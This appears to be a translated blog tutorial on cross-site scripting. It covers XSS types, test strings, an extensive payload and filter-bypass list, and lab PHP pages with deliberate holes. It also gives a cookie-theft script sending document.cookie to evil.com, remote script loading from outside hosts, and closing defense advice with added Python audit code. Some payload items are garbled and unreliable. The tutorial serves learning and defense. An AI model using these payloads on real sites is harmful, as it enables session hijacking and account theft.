Network security from zero: understanding the principles of XSS

01. The principle and classification of XSS

Cross-site scripting (Cross Site Scripting) is abbreviated as XSS rather than CSS, so that it is not confused with the abbreviation of Cascading Style Sheets (CSS).

In an XSS attack, a malicious attacker inserts malicious script code into a Web page. When a user browses the page, the script embedded in the page is executed in the user's browser, achieving the purpose of attacking that user. XSS is therefore a user-level attack: its target is the user, not the server;

XSS is divided into three types: stored, reflected and DOM-based XSS.

Stored XSS: persistent; the code is stored on the server, for example by inserting it into personal information or a published article. If there is no filtering, or the filtering is not strict, the code is saved in the database and executes whenever a user visits the page. This kind of XSS is the most dangerous, and it easily leads to worms and cookie theft;

Reflected XSS: non-persistent; the user must be tricked into clicking a link to trigger the XSS code (the page content does not exist on the server). It commonly appears on search pages, and most reflected XSS is used to steal the user's cookie information;

DOM-based XSS: does not go through the back end. The DOM-XSS vulnerability is based on the Document Object Model (DOM): it is triggered when input parameters from the URL reach client-side code that manipulates the DOM, so in effect it is a variant of reflected XSS;


Properties and methods that may trigger DOM-based XSS:

document.referrer
window.name
location
innerHTML
document.write

02. The dangers of XSS attacks

1. Stealing user accounts of all kinds, such as machine login accounts, online banking accounts and administrator accounts;
2. Controlling enterprise data, including reading, tampering with, adding and deleting sensitive enterprise data;
3. Stealing important enterprise information with commercial value;
4. Illegal transfer of funds;
5. Forced sending of emails;
6. Planting malicious code on websites;
7. Controlling victims' machines to attack other websites;

03. XSS test statement

When checking whether a website has an XSS vulnerability, enter some tag characters such as < and >, then check in the page source whether the input was filtered. If it was not filtered, there is a high probability of an XSS vulnerability.

Commonly used test statements:

<h5>1</h5>
<span>1</span>

If these render, the website does not filter the tags;

<script>console.log(1);</script>

There is no pop-up, but 1 is printed on the console, so we can be sure that there is XSS;

Closure problem: many times when testing XSS we need to consider how the injection point is enclosed. First look at the page source and judge whether the value is wrapped in single quotes or double quotes;

"><span>x</span><"
'><span>x</span><'

Single-line comment:

"><span>x</span>//   # the double slash comments out the rest of the statement

04. XSS attack statements

Once input testing shows that tags are not filtered, XSS attack code is inserted to demonstrate that the vulnerability exists;

<script>alert(1)</script>
<svg onload=alert(1)>
<a href=javascript:alert(1)>
<a href='javascript:alert(1)'>aa</a>

(1) Ordinary XSS JavaScript injection: <SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
(2) IMG tag XSS using JavaScript commands: <IMG SRC=http://3w.org/XSS/xss.js/>
(3) IMG tag without semicolons and quotes: <IMG SRC=javascript:alert('XSS')>
(4) IMG tags are case insensitive: <IMG SRC=JaVaScRiPt:alert('XSS')>
(5) HTML encoding (semicolons are required): <IMG SRC=javascript:alert("XSS")>
(6) Bug-corrected IMG tag: <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
(7) fromCharCode: <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
(8) UTF-8 Unicode encoding: <IMG SRC=jav..omitted..S')>
(9) 7-bit UTF-8 Unicode encoding without semicolons: <IMG SRC=jav..omitted..S')>
(10) Hex encoding, also without semicolons: <IMG SRC=&#x6A&#x61&#x76&#x61..omitted..&#x58&#x53&#x53&#x27&#x29>
(11) Embedded tab splitting the JavaScript: <IMG SRC="jav ascript:alert('XSS');">
(12) Embedded encoded tab splitting the JavaScript: <IMG SRC="jav ascript:alert('XSS');">
(13) Embedded newline: <IMG SRC="jav ascript:alert('XSS');">
(14) Embedded carriage return: <IMG SRC="jav ascript:alert('XSS');">
(15) Embedded multi-line JavaScript, an extreme XSS example: <IMG SRC="javascript:alert('XSS')">
(16) Getting around restricted characters (requires the same page):
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+'src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval_r(z)</script>
(17) Null character: perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out
(18) Null character 2 (the null character basically has no effect in China, because there is nowhere to use it): perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
(19) Spaces and meta characters before the IMG tag's URL: <IMG SRC=" javascript:alert('XSS');">
(20) Non-alpha-non-digit XSS: <SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(21) Non-alpha-non-digit XSS 2: <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
(22) Non-alpha-non-digit XSS 3: <SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>
(23) Double open brackets: <<SCRIPT>alert("XSS");//<</SCRIPT>
(24) No closing script tag (only browsers such as Firefox): <SCRIPT SRChttp://3w.org/XSS/xss.js?<B>
(25) No closing script tag 2: <SCRIPT SRC=//3w.org/XSS/xss.js>
(26) Half-open HTML/JavaScript XSS: <IMG SRC="javascript:alert('XSS')"
(27) Double open angle brackets: <iframe src=http://3w.org/XSS.html <
(28) No single quotes, double quotes or semicolons: <SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
(29) Escaping filtered JavaScript: \";alert('XSS');//
(30) Closing the TITLE tag: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
(31) INPUT image: <INPUT SRC="javascript:alert('XSS');">
(32) BODY image: <BODY BACKGROUND="javascript:alert('XSS')">
(33) BODY tag: <BODY('XSS')>
(34) IMG DYNSRC: <IMG DYNSRC="javascript:alert('XSS')">
(35) IMG LOWSRC: <IMG LOWSRC="javascript:alert('XSS')">
(36) BGSOUND: <BGSOUND SRC="javascript:alert('XSS');">
(37) STYLE sheet: <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
(38) Remote style sheet: <LINK REL="stylesheet" HREF="http://3w.org/xss.css">
(39) List-style-image: <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
(40) IMG VBScript: <IMG SRC='vbscript:msgbox("XSS")'>
(41) META refresh URL: <META HTTP-EQUIV="refresh" CONTENT="0;URL=http://URL=javascript:alert('XSS');">
(42) IFRAME: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
(43) FRAME: <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
(44) TABLE: <TABLE BACKGROUND="javascript:alert('XSS')">
(45) TD: <TABLE><TD BACKGROUND="javascript:alert('XSS')">
(46) DIV background-image: <DIV STYLE="background-image: url(javascript:alert('XSS'))">
(47) DIV background-image with extra characters added (1-32&34&39&160&8192-8&13&12288&65279): <DIV STYLE="background-image: url(javascript:alert('XSS'))">
(48) DIV expression: <DIV STYLE="width: expression_r(alert('XSS'));">
(49) STYLE attribute split expression: <IMG STYLE="xss:expression_r(alert('XSS'))">
(50) Anonymous STYLE (an open angle bracket followed by a letter): <XSS STYLE="xss:expression_r(alert('XSS'))">
(51) STYLE background-image: <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><ACLASS=XSS></A>
(52) IMG STYLE with expression: exppression(alert("XSS"))'>
(53) STYLE background: <STYLE><STYLEtype="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
(54) BASE: <BASE HREF="javascript:alert('XSS');//">
(55) EMBED tag, which can embed a Flash file containing XSS: <EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>
(56) Using ActionScript in Flash to obfuscate the XSS code: a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval_r(a+b+c+d);
(57) XML namespace (the .HTC file must be on the same server as the XSS carrier): <HTML xmlns:xss><?import namespace="xss" implementation="http://3w.org/XSS/xss.htc"><xss:xss>XSS</xss:xss></HTML>
(58) If JS is filtered, JS code can be placed inside an image: <SCRIPT SRC=""></SCRIPT>
(59) IMG embedded command, which can execute any command: <IMG SRC="http://www.a.com/a.php?a=b">
(60) IMG embedded command (a.jpg on the same server): Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
(61) Filtering around symbols: <SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>
(62) <SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>
(63) <SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>
(64) <SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>
(65) <SCRIPT a= > SRC="http://3w.org/xss.js"></SCRIPT>
(66) <SCRIPT a=">'>"SRC="http://3w.org/xss.js"></SCRIPT>
(67) <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
(68) URL bypass: <A HREF="http://127.0.0.1/">XSS</A>
(69) URL encoding: <A HREF="http://3w.org">XSS</A>
(70) IP in decimal: <A HREF="http://3232235521">XSS</A>
(71) IP in hex: <A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>
(72) IP in octal: <A HREF="http://0300.0250.0000.0001">XSS</A>
(73) Mixed encoding: <A HREF="http://6 6.000146.0x7.147/">XSS</A>
(74) Omitting http: <A HREF="//www.google.com/">XSS</A>
(75) Omitting www: <A HREF="http://google.com/">XSS</A>
(76) Absolute DNS name (trailing dot): <A HREF="http://www.google.com./">XSS</A>
(77) javascript link: <A HREF="javascript:document.location='http://www.google.com/'">XSS</A>

Attack statements for each tag;

script tag:

<script>alert("hack")</script>                 # pops up hack
<script>alert(/hack/)</script>                 # pops up hack
<script>alert(1)</script>                      # pops up 1; numbers need no quotes
<script>alert(document.cookie)</script>        # pops up the cookie
<script src=http://xxx.com/xss.js></script>    # loads an external xss script

svg tag:

<svg onload="alert(1)">
<svg onload="alert(1)"//

img tag:

<img src=1 onerror=alert("hack")>
<img src=1 onerror=alert(document.cookie)>     # pops up the cookie

body tag:

<body onload=alert(1)>
<body onpageshow=alert(1)>

video tag:

<video onloadstart=alert(1) src="/media/hack-the-planet.mp4" />

style tag:

<style onload=alert(1)></style>

05. XSS vulnerability mining

5.1. Black box testing

Try to find everything that is user-controllable and can be output in the page code, such as the following:

  • Every parameter of the URL

  • the URL itself

  • form

  • search bar

5.2. Common business scenarios

  • Hardest-hit areas: comment area, message area, personal information, order information, etc.

  • Targeted type: In-site messages, web instant messaging, private messages, feedback

  • There are risks: search box, current directory, image attributes, etc.;

5.3. White box audit

XSS code auditing mainly starts from the places where parameters are received, plus a few key points;

Common ways of receiving parameters in PHP include $_GET, $_POST, $_REQUEST, etc. You can search for every place that receives a parameter, track the received data to see whether it is output to the page, and then check whether the data output to the page was filtered or HTML-encoded first;

You can also search for output statements such as echo and track where the output variable comes from and whether we can control it. If it comes from the database, check whether we can control the data stored there and whether it was filtered before being saved, etc.;

Most programs call parameter-receiving functions encapsulated in shared files, so we need to audit these shared functions to see whether they filter and whether the filtering can be bypassed;

Similarly, to audit DOM-type injection, search for the JS keywords that manipulate DOM elements;
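As an added example (not code from the original post), the following Python pass applies the audit rules of 5.3 mechanically: it looks for $_GET/$_POST/$_REQUEST sources, follows them to echo sinks unless a sanitizer wraps them, and flags the DOM sinks listed in section 01. The inputs are constructed snippets modelled on the action.php of 7.2 and the innerHTML line of 7.4; the regexes and the sanitizer list are assumptions, not a real PHP parser.

```python
import re

# Constructed samples (not the post's exact files): the reflected-XSS action.php from
# section 7.2, a patched version, and the innerHTML line from the DOM example in 7.4.
PHP_VULNERABLE = '<?php\n$name=$_POST["name"];\necho $name;\n?>'
PHP_FIXED = "<?php\n$name = htmlspecialchars($_POST['name'], ENT_QUOTES, 'UTF-8');\necho $name;\n?>"
JS_VULNERABLE = 'var text=document.getElementById("text");\nprint.innerHTML=text.value;'
JS_FIXED = 'var text=document.getElementById("text");\nprint.textContent=text.value;'

# Hypothetical, deliberately small rule set; a real audit follows the data by hand as the post says.
SUPERGLOBAL = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\b")
ASSIGN = re.compile(r"\$(\w+)\s*=(?!=)\s*([^;]+);")
OUTPUT = re.compile(r"\b(?:echo|print)\s+([^;]+);|<\?=\s*(.+?)\?>")
VAR = re.compile(r"\$(\w+)")
SANITIZERS = ("htmlspecialchars(", "htmlentities(", "strip_tags(", "intval(")
DOM_SINKS = ("innerHTML", "outerHTML", "document.write(", "eval(")


def audit_php(src):
    """Return (line, message) pairs where request data reaches output without encoding."""
    tainted = set()
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        for var, rhs in ASSIGN.findall(line):
            if SUPERGLOBAL.search(rhs) and not any(s in rhs for s in SANITIZERS):
                tainted.add(var)        # raw request data assigned to $var
            else:
                tainted.discard(var)    # overwritten with something else, or sanitized
        for m in OUTPUT.finditer(line):
            expr = m.group(1) or m.group(2)
            if any(s in expr for s in SANITIZERS):
                continue                # encoded at the output point
            if SUPERGLOBAL.search(expr):
                findings.append((lineno, "request data echoed directly"))
            for v in VAR.findall(expr):
                if v in tainted:
                    findings.append((lineno, f"tainted ${v} reaches output"))
    return findings


def audit_js(src):
    """Flag client-side lines that write into a DOM sink; textContent is not a sink."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), 1):
        hits = [s for s in DOM_SINKS if s in line]
        if hits:
            findings.append((lineno, "DOM sink: " + ", ".join(hits)))
    return findings


if __name__ == "__main__":
    print("vulnerable:", audit_php(PHP_VULNERABLE))   # [(3, 'tainted $name reaches output')]
    print("fixed:", audit_php(PHP_FIXED))             # []
    print("dom:", audit_js(JS_VULNERABLE))            # [(2, 'DOM sink: innerHTML')]
    print("dom fixed:", audit_js(JS_FIXED))           # []
```

Data that comes back out of the database (the show2.php case in 7.3) is not tracked by this pass and still has to be followed by hand.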

06. XSS attack process

6.1. Reflected XSS vulnerability:

1. Alice often browses a certain website owned by Bob. Bob's website requires Alice to log in with a user name and password, and stores Alice's sensitive information (such as bank accounts);

2. Tom finds a reflected XSS vulnerability in Bob's site;

3. Tom uses the reflected XSS vulnerability of Bob's website to write an exploit, packages it into a link, and uses various means to induce Alice to click it;

4. After logging in to Bob's site, Alice opens the malicious link provided by Tom;

5. The malicious script embedded in the link is executed in Alice's browser. It steals sensitive information (cookie, account number, etc.) and sends it to Tom without Alice's knowledge;

6. Tom can use the acquired cookie to log in to Bob's site as Alice. If the script is more powerful, Tom can also control Alice's browser and exploit it further;

6.2. Stored XSS vulnerability:

1. Bob owns a Web site that allows users to publish information and browse published information;

2. Tom detects that Bob's site has a stored XSS vulnerability;

3. Tom publishes a hotspot information with a malicious script on Bob's website, which is stored in the database of Bob's server, and then attracts other users to read the hotspot information;

4. After Bob or any other person, such as Alice, browses the information, Tom's malicious script will be executed;

5. After Tom's malicious script is executed, Tom can launch an XSS attack on the users of the browser page;

07. XSS attack test

7.1. Remotely loading the attack payload

XSS vulnerabilities can realize many functions by constructing malicious XSS statements. The common use is to construct XSS code that obtains the cookie from the other party's browser;

1) We first save the malicious code locally in Kali; in actual combat, the code is saved on our own server:

var img=document.createElement("img");
img.src="http://www.evil.com/log?"+escape(document.cookie);   // the image request carries document.cookie to the logging server
document.body.appendChild(img);                               // appending the element makes the browser send the request

2) In Kali, use Python to start an HTTP service:

python -m http.server 80

3) We remotely load our malicious code where the XSS vulnerability is:

<script src="http://192.168.61.128/xss.js"></script>

The browser can be seen loading our malicious XSS code;

4) The cookie information is obtained successfully;

5) Loading via an image tag:

<img src=''onerror=document.body.appendChild(document.createElement('script')).src='//192.168.0.110/xss.js'>

6) Character splicing

This is generally used when the number of input characters is limited.

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://www.'</script>
<script>z=z+'xsstools'</script>
<script>z=z+'.com/a'</script>
<script>z=z+'mER></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

In some cases /**/ is needed to comment out the unwanted code.

7) jQuery loading

<script>$.getScript("//www.xsstools.com/amER");</script>

7.2. Reflected XSS:

// Front end, 1.html:
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title>反射型XSS</title>
</head>
<body>
    <form action="action.php" method="post">
        <input type="text" name="name" />
        <input type="submit" value="提交">
    </form>
</body>
</html>

// Back end, action.php:
<?php
    $name=$_POST["name"];   // the submitted name is echoed back with no filtering or encoding
    echo $name;
?>

We then enter in the input box: <script>alert(/xss/)</script>

The page pops up xss directly: the statement we inserted was executed by the page. This is the most basic reflected XSS vulnerability, and its data flow is: front-end --> back-end --> front-end

7.3. Stored XSS:

// Front end, 2.html:
<html>
<head lang="en">
    <meta charset="UTF-8">
    <title>存储型XSS</title>
</head>
<body>
    <form action="action2.php" method="post">
        输入你的ID:<input type="text" name="id" /> <br/>
        输入你的Name:<input type="text" name="name" /> <br/>
        <input type="submit" value="提交">
    </form>
</body>
</html>

// Back end, action2.php:
<?php
  $id=$_POST["id"];
  $name=$_POST["name"];
  mysql_connect("localhost","root","root");
  mysql_select_db("test");
  $sql="insert into xss value ($id,'$name')";   // user input is stored unfiltered (and concatenated straight into the SQL)
  $result=mysql_query($sql);
?>

// Page visited by other users, show2.php:
<?php
  mysql_connect("localhost","root","root");
  mysql_select_db("test");
  $sql="select * from xss where id=1";
  $result=mysql_query($sql);
  while($row=mysql_fetch_array($result)){
      echo $row['name'];   // the stored value is output without encoding
  }
?>

Here is a page where a user submits data. After the data is submitted to the back end, the back end stores it in the database; when other users visit another page, the back end retrieves the data and displays it to them, and the XSS code is executed;

We enter 3 and <script>alert(/xss/)</script>, and then look at the database;

As you can see, our XSS statement has been inserted into the database;

Then when other users visit the show2.php page, the XSS code we inserted is executed;

The data flow of stored XSS is: front-end --> back-end --> database --> back-end --> front-end

7.4. DOM-based XSS

The source code first:

// Front end, 3.html:
<html>
  <head lang="en">
  <meta charset="UTF-8">
  <title>DOM型XSS</title>
  </head>
  <body>
  <form action="action3.php" method="post">
  <input type="text" name="name" />
  <input type="submit" value="提交">
  </form>
  </body>
</html>

// Back end, action3.php:
<?php $name=$_POST["name"];?>
<input id="text" type="text" value="<?php echo $name; ?>"/>
<div id="print"></div>
<script type="text/javascript">
  var text=document.getElementById("text");
  var print=document.getElementById("print");
  print.innerHTML=text.value;  // Take the value of text and write it into print; this is the main cause of the XSS.
</script>

Here is a submission page where users can submit data; after submission the data is processed in the background;

We can enter <img src=1 onerror=alert('hack')> and then observe the change on the page;

The page pops up hack directly, and the statement we inserted has been executed by the page;

This is a DOM-based XSS vulnerability. Its data flow is: front-end --> browser

08. XSS encoding bypass

8.1. GPC character filtering

If GPC is turned on, special characters are escaped with a backslash, that is, ' becomes \', so XSS attack code should avoid single and double quotes;

magic_quotes_gpc is no longer available by default in newer versions of PHP, but developers may use addcslashes() to escape special characters. In that case <script src='http://www.xss123.com/JGdbsl?1623638390'></script> cannot be executed, while <script src=http://www.xss123.com/JGdbsl?1623638390></script> without single quotes can.

8.2. Filtering alert

Because alert produces a pop-up, many programs filter it and many WAFs intercept it, so the page may block the alert function. Test without alert instead:

<script>prompt(/xss/);</script>
<script>confirm(1);</script>
<script src=http://www.xss123.com/eciAKJ?1623635663></script>

copy code

8.3. Filtering tags

If the program uses HTML entity filtering, in PHP this means htmlspecialchars() entity-encodes the input characters, and encoded characters are not executed in HTML. The predefined characters "<" (less than) and ">" (greater than) are converted into HTML entities, and most XSS code needs < or >, so after these two characters are entity-encoded the code cannot execute in HTML;

The predefined characters are:

& (ampersand) becomes &amp;

" (double quote) becomes &quot;

' (single quote) becomes &#039;

< (less than) becomes &lt;

> (greater than) becomes &gt;

But when injecting into an existing input tag, entity encoding of < and > does not matter, because the payload does not use those two characters at all:

<input type="text" name="username" value="" onclick="javascript:alert('xss');"/>

8.4. ASCII encoding

<script>alert(String.fromCharCode(88,83,83))</script>

8.5. URL encoding

<a href="javascript:%61%6c%65%72%74%28%32%29">123</a>

8.6. JS encoding

Encoding tool: https://www.jb51.net/tools/zhuanhuan.htm

Octal encoding:

<script>eval("\141\154\145\162\164\50\61\51");</script>

Hexadecimal encoding:

<script>eval("\x61\x6c\x65\x72\x74\x28\x31\x29")</script>

JS Unicode encoding:

<script>\u0061\u006c\u0065\u0072\u0074('xss');</script>

8.7. HTML encoding

HTML entity encoding is decoded inside attribute values (after the =):

Decimal:

<img src="x" onerror="&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;" />
<button onclick="confirm('7&#39;);">Button</button>

Hexadecimal:

<img src="x" onerror="&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;"/>

8.8. Base64 encoding

Use the data: pseudo-protocol, which base64-decodes its content, to execute XSS:

<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">111</a>
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

09. XSS defense

The general idea of XSS defense is: filter the user's input (including URL parameters) and HTML-encode the output. That is, filter all content submitted by the user and all parameters in the URL, removing anything that would cause a script to execute, and then HTML-encode the content that is dynamically output to the page so that no script can execute in the browser;

Input filtering can be divided into blacklist and whitelist filtering. Blacklist filtering blocks most XSS attacks but still risks being bypassed; whitelist filtering can basically eliminate XSS, but such strict whitelist filtering is generally not feasible in a real environment;

HTML-encoding the output means passing the user's input data through a function that HTML-encodes it so that it cannot run as a script;

The following uses PHP's htmlspecialchars function to HTML-encode the name parameter input by the user, converting it into HTML entities:

# Use htmlspecialchars to HTML-encode the user-supplied name parameter, converting it into HTML entities
$name = htmlspecialchars( $_GET[ 'name' ] );

We can also set the HttpOnly attribute on the session cookie on the server side, so that client-side JS cannot read the cookie;
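An added example (not the post's own code) that exercises the defenses above in Python: an equivalent of htmlspecialchars with ENT_QUOTES, a DOM-level check that the attribute-injection payload from 8.3 no longer yields an event handler, an href scheme allowlist for the javascript:/data: payloads of 8.5 and 8.8 that entity encoding alone does not stop, and the HttpOnly session cookie. The helper names are my own, and the Secure and SameSite flags are assumed defaults.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote

# The same five predefined characters PHP's htmlspecialchars() handles (listed in 8.3).
HTML_ENTITIES = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;"}


def htmlspecialchars(s, ent_quotes=True):
    """Encode the predefined characters; ent_quotes=False mimics the old ENT_COMPAT default."""
    return "".join(ch if (ch == "'" and not ent_quotes) else HTML_ENTITIES.get(ch, ch) for ch in s)


class TagCollector(HTMLParser):
    """Parse the output the way a browser would, so checks run on the resulting elements."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(html):
    p = TagCollector()
    p.feed(html)
    p.close()
    return p.tags


def render_input(username, ent_quotes=True, quote='"'):
    """The post's <input ... value=""> field, with the user value encoded into the attribute."""
    return f'<input type="text" name="username" value={quote}{htmlspecialchars(username, ent_quotes)}{quote}/>'


def has_event_handler(html):
    """True if any parsed element ended up with an on* attribute (the 8.3 attribute bypass)."""
    return any(name.startswith("on") for _, attrs in parse_tags(html) for name in attrs)


def safe_href(url):
    """URL context: entity encoding leaves javascript:/data: links intact, so percent-decode,
    drop the control characters browsers ignore inside a scheme, and allowlist http(s)."""
    cleaned = re.sub(r"[\x00-\x20]", "", unquote(url))
    scheme = re.match(r"([a-z][a-z0-9+.\-]*):", cleaned, re.I)
    if scheme and scheme.group(1).lower() not in ("http", "https"):
        return None
    return htmlspecialchars(url)   # accepted values are still attribute-encoded


def session_cookie(value):
    """HttpOnly keeps document.cookie (the payload in 7.1) from reading the session id."""
    return f"session={value}; Path=/; HttpOnly; Secure; SameSite=Lax"
```

For the DOM sink in 7.4 the server-side encoding does not apply; there the client must assign text.value to print.textContent rather than innerHTML.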


Origin blog.csdn.net/jazzz98/article/details/131168235